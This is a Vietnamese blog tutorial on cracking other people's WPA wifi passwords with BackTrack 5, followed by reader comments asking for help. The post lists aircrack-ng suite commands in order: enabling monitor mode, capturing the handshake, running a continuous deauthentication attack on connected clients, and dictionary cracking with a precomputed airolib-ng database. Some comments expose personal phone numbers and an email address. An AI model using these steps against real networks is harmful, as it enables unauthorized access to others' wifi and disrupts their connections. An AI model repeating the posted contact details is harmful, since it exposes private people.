Hack wifi WPA với BACKTRACK 5
Các bước tiến hành như sau :
1, bật 1 cửa sổ lệnh và gõ :
iwconfig (cái này để xem các card trong máy).
airmon-ng ( để xem máy mình có card wifi hỗ trợ trong Backtrack ?).Nếu không có thì thôi,khỏi hack lun.
airmon-ng stop wlan0 (interface của card tương thích hiện ra trong lệnh airmon-ng trên).
ifconfig wlan0 donw (không có bước này thì không chạy được đâu nhá!).
ifconfig wlan0 up
airmon-ng start wlan0
airodump-ng mon0 (mon0 là monitor interface của wlan0 sau khi thực hiện lệnh airmon-ng start wlan0).
2, mở 1 của sổ lệnh khác gõ :
airodump-ng --bssid BSSID -w wpafile -c CH mon0
( BSSID là MAC tương ứng với wifi mình định hack,hiên ra ở bảng airodump-ng mon0.
wpafile là tên 1 file mình đặt để nó tạo ra file .cap cho mình.
CH là channel tương ứng với cột CH hiện ra ở bảng airodump-ng mon0 của wifi mình định hack.
)
aireplay-ng --deauth 0 -a BSSID -c STATION mon0 (gửi đi liên tục các gói tin để thu được WPA handshake ,có thể phải thực hiện vài lần lệnh này cho đến khi nó chạy liên tục).
3. Chuyển sang cửa sổ của lệnh airodump-ng mon0,chờ đến khi xuất hiện dòng WPA handshake thì dừng lại bằng cách ấn CTRL +C.rồi gõ lệnh :
aircrack-ng -w /đường dẫn đến file passwordlist/password.lst /đường dẫn đến file wpafile-01.cap/wpafile-01.cap (thường là /root/wpafile-01.cap ;wpafile chính là tên tương ứng với lên airodump ở trên ;password.lst là file có chứa từ điển pass , mình phải download trên mạng về,có thể là file .text hoặc .dic)
Bây giờ ngồi chờ báo KEY FOUND thôi. :d.
Tuy nhiên cách này rất lâu, chỉ dò được khoảng 900key/s.
Có cách khác nhanh hơn có thể dò được khoảng 30000-40000key/s .Đó là tạo database cho Backtrack.Làm như sau :
- Các bạn mở thêm 1 cửa sổ lệnh khác, gõ :
airolib-ng crackwpa --import essid /đường dẫn/essid.txt (essid.txt là file có chứa SSID(tên hiện ra) của wifi mình hack ; crackwpa là tên database mà mình sẽ tạo ra).
airolib-ng crackwpa --import passwd /đường dẫn/password.lst
airolib-ng crackwpa --batch ( kết hợp essid và password.lst , sẽ phải đợi hơi lâu để hoàn thành).
aircrack-ng -r crackwpa wpa*.cap (bây giờ tốc độ dò lên đến 30000k/s ). :d
Cái này phải phụ thuộc rất nhiều vào file password.lst ,nếu nó không chứa pass của wifi thì chịu chết k hack được.
Link download Back Track 5 R2
Chú ý : Để log vào giao diện của BT5 gõ : startx
Đăng ký:
Đăng Nhận xét (Atom)
Bạn ơi bạn giải thích chỗ này hộ mình đc ko
Trả lờiXóaairolib-ng crackwpa --import essid /đường dẫn/essid.txt
File essid.txt la file gì vậy bạn, và nó ở chỗ nào
essid.txt là file có chứa SSID(tên hiện ra) của wifi mình hack.
XóaVí dụ : wifi mình định hack có tên là Speed thì nội dung file essid.txt là Speed.
Sao minh burn ra dia DVD roi ma ko co file chay nhi la qua. Huong dan minh voi
XóaBạn D. ơi;muốn xử dụng airolib-ng có phải cài thêm chương trình để chạy nó không vì đả chạy được aircrack-ng rồi nhưng airolib-ng thì cứ báo là không tìm thấy.Bạn nói rỏ hơn được không
Trả lờiXóaBạn kiểm tra xem đường dẫn file đúng k?và gõ đúng lệnh chưa.Mình làm trên bt5 được mà.
XóaBạn ơi có cách nào tạo database passwd list nhanh hơn không? tạo kiểu này lâu quá. dict.txt có 2.4mb mà mất cả 20 phút, tốc độ so sánh passwd của mình lên 40000 k/s dùng aircrack-ng 1.1.
Trả lờiXóaNếu dict.txt mà 100mb thì gần 14h chắc lè lưỡi quá. Ai có cách nào nhanh hơn chỉ mình với nha.
hic, cái làm database này lâu thật.m nghĩ nó đươc chuẩn bị trước rùi,mình phải cài backtrack vào HDD rùi tạo trước cái database này.còn dùng livecd thì chắc là chịu.
XóaBạn Dũng ơi, mình đang ko biết làm cách nào cho nó hiện Card wifi trên máy mình được. Mình mới cài BT5 R2, mà nó ko nhận card wifi. Buồn quá, ko biết làm sao giờ cho nó nhận đây ? Gõ lệnh airmon-ng nó ko ra cái gì cả ???? Bạn vui lòng giúp mình được chứ ? Bạn nhá máy hoặc nhắn tin vào số 0982 103 960 giúp mình. Mình sẽ gọi lại ngay cho bạn. Bạn hướng dẫn giúp mình nhé ? Thanks alot !
Xóamình cũng gặp trường hợp như bạn này ko tìm thấy card wifi, bjo mình cũng chẵng biết làm s. mong bạn giúp mình vs.
Xóa(Xin loi vi e dung BT5 nen k go dc tieng Viet). Anh oi cho e hoi tai sao AP co client connected nhung tren cua so airodump-ng mon0 cot Data deu la 0? Nhu vay la may e bi sao? hay can go them lenh gi ha anh? Vi vay nen k co STATION. Mong anh chi e cach khac phuc! thanks anh nhieu.
Trả lờiXóaNếu hack WPA thì không cần nhìn Data làm gì đâu, chỉ cần thấy client kết nối là được.bạn kéo dài cái cửa sổ airodump-ng ra.hoặc bạn gõ thêm lệnh airodump-ng --bssid BSSID -w wpafile -c CH mon0 ! lệnh nầy để theo dõi riêng cái wifi mình muốn hack thui.lúc đấy có client thì nó sẽ hiện lên.
XóaEm làm đến bước này rồi, nhưng dòng STATION không có gì, Data là 0. Em lên mạng search thì biết là do không có client đăng nhập, nhưng thực tế mấy đứa bạn em vẫn đang dùng mạng( em test trên wifi phòng mình). Em k có STATION nên không làm được bước: aireplay-ng --deauth 0 -a BSSID -c STATION mon0 (gửi đi liên tục các gói tin để thu được WPA handshake ,có thể phải thực hiện vài lần lệnh này cho đến khi nó chạy liên tục). Như vậy thì em phải làm sao để có STATION ạ?
Trả lờiXóaThanks anh vì đã trả lời! Mong anh chỉ rõ thêm cho em.
con cach nao khac de up k/s khong may anh. Em da tao duoc 1 dic toan 8 ky tu so(khoang 800MB), 1 dic toan 9 ky tu so ( khoang 8gb), 1 dic toan 10 ky tu so ( khoang 80 gb), the nhung viec tim pass bang aircrack toc to cham qua ( chi 1000k/s).vay de tim ra pass cua dic 8 ky tu can khoang 25 tieng.Em mong co cach khac nhanh hon 2 cach tren.
Trả lờiXóahic. giờ mình cũng chưa tìm ra cách nào dò pass nhanh hơn được. Mình dò pass chỉ là hên xui, tạo ra một từ điển với các pass hay đặt như số điện thoại, ngày sinh,họ tên.Ăn may thì được, chứ pass khác thì chịu.
XóaTrần Văn Dũng ơi bạn có yahoo ko co mình xin vs ^^?
Xóamình không phải là dân IT nên ai có thể kiên nhẩn hướng dẩn mình củ thể và tỉ mĩ đc không, nếu được mình cảm ơn nhiều
Trả lờiXóaYahoo của mình là caule.no_1@yahoo.com.vn
Mình xin cảm ơn,
Àh sẳn tiện cho mình hỏi phải burm BLT 5 ra DVD àh.
Trả lờiXóamong sớm nhận được sự hồi âm
ko nhất thiết phải burm ra dvd dâu bạn, bạn có thể boot bằng usb, " cây nhà lá vườn"
XóaCái này phải phụ thuộc rất nhiều vào file password.lst ,nếu nó không chứa pass của wifi thì chịu chết k hack được...rất tốn thời gian... file password.lst ko chứa pass thì có mà mơ
Trả lờiXóaban cho minh hoi minh sai VM-ware no k nhan card wireless jo minh muon chinh cho no nhan card ntn z ban?
Trả lờiXóachỉ nhận những card gắn ngoài như usb wifi còn card trong laptop không nhận khi dùng VM-ware chỉ boot từ ngoài mới được
Xóamình dùng BT5 nhưng nó không nhận card mạng. mà trên trang BT thì không có các bản BT cũ hơn, Mình đã thử nhiều lần nhưng vẫn không nhận được.hic
Trả lờiXóafile password .lst down ở đâu vậy
Trả lờiXóacho minh link down file password.lst woi @
Trả lờiXóaxin bạn chỉ dẫn tận tình hơn chút 01689468998 liêụ có thể giúp mình và được xem hách 1 cái đơn giản bằng máy cuả bạn được không phiền bạn mình ở hà nôị
Trả lờiXóacó ai biết mua USB card wifi nào hỗ trợ Backtrack 5 ko chỉ e với ^^?
Trả lờiXóaa dung oi,cho e xin sdt duoc khong a
Xóasdt cua e la: 01648999530, mong anh giup e nhe
Xóacài tất cả ngon lành rùi: vào gõ lệnh đầu tiên mà k hiện ra cấy chi cả :hình như k nhận đc wifi nào. card k hỗ trợ backtrack rùi. =((
Trả lờiXóaa Trần Văn Dũng oi! a có thể post 1 đoạn video hướng dẫn cụ thể được ko a?
Trả lờiXóaa D ơi e xài Lap hãng Dell khi hack sao data nó k chịu chạy là sao z...trong khi đó các máy khác vẫn chạy bt
Trả lờiXóachao ban dung ban co the de lai so dien thoai tren nay duoc ko
Trả lờiXóaChào bạn Dũng bạn vui lòng cho mình xin số diện thoại của bạn dược không
Trả lờiXóahttp://www.youtube.com/watch?v=Gq_TohxP4rA&feature=related
Trả lờiXóano day cac ban ah ^_^
vậy card wifi của em là eth1 liệu có làm được không bạn ???
Trả lờiXóaNếu gõ lệnh iwconfig hiện và airmon-ng hiện thông số là OK
XóaCác bạn đọc kĩ bài hướng dẫn của mình nhé.Máy nào không hiện card thi không hack được đâu.hì.
Trả lờiXóacho minh hoi la cai vao may la no tu do lun ah hay la phai go lenh
Trả lờiXóaBạn Dũng ơi cho mình hỏi "mở 1 của sổ lệnh khác gõ :" cách mở cái này như thế nào bạn chỉ cho mình với, mình không biết cách mở, cảm ơn bạn nhiều nhé.
Trả lờiXóaQuan trọng là từ điển
Trả lờiXóaCó thể upload một số từ điển hay dùng không?
Mình đã thu được WPA handshake nhưng không có từ điển nên đành chịu
Trả lờiXóaSao mới iwconfig thoi da khong co nhan card wifi rui . laptop bat wifi binh thuong
Trả lờiXóalam` sao go~ bo? backtrack ra khoi may' tinh' vay anh
Trả lờiXóaem lo~ chay install va` lo~ xoa' user admin
Trả lờiXóaem ko vao backtrack dc vi` mat pass backtrack
Trả lờiXóalam sao bjt card mang co ho tro hay ko zay
Trả lờiXóabạn ơi mình dùng BT5R3 nhung boot lên thi chi có màn hình nhập lệnh fullscreen lun, không có các taskbar gì hết. mình muốn vào giao diện chủ như trên window để mở cửa sổ khác. bạn chỉ giúp mình với được với. thanks
Trả lờiXóabạn cho mình hỏi í...thế mình đùn toshiba l40-a làm sao để cài được card wifi hô trợ trong bt5?mình tìm hoài không thấy
Trả lờiXóaAnh Dũng ơi! cho em hỏi hack wifi trên VMware. cài backtrack được rồi, nhưng card mạng thì không thấy có trên máy ảo. Chỉnh card về NAT thì được, nhưng xài ké với máy thật thôi, không hack được, anh chỉ em với. cảm ơn Anh nhiều.
Trả lờiXóaChạy trên máy tính ảo thì BT5 ko nhận card wifi đâu bạn
Trả lờiXóaban oi no kh hien ra wlanO thi sao ha ban . minh sai laptop asus kh biet co card wifi kh nua . sao minh gõ dòng lệnh iwconfig no kh hien ra card mang
Trả lờiXóaSao em ko tai duoc?
Trả lờiXóa